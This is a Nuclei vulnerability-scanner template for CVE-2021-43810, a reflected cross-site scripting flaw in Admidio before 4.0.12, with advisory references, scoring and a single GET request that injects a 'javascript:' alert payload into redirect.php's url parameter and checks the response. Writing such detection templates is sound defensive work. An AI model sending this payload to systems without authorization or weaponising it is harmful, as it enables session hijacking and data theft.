nuclei-templates/http/cves/2021/CVE-2021-43810.yaml

51 lines
2.0 KiB
YAML

id: CVE-2021-43810
info:
name: Admidio - Cross-Site Scripting
author: gy741
severity: medium
description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: Upgrade to version 4.0.12 or later.
reference:
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
- https://github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b
- https://github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21
- https://github.com/Admidio/admidio/releases/tag/v4.0.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-43810
cwe-id: CWE-79
epss-score: 0.00396
epss-percentile: 0.73393
cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: admidio
product: admidio
tags: cve2021,cve,admidio,xss
http:
- method: GET
path:
- '{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'please click <a href="javascript://%0aalert(document.domain)" target="_self">'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100953a61bb137c40872ac341046a3d349378dfe44509b0bf81b8dea18ef859cc9402206cb18380503695b43cd279e399ef8aaa40547d01d55325928f48b3e8ed5a395b:922c64590222798bb761d5b6d8e72950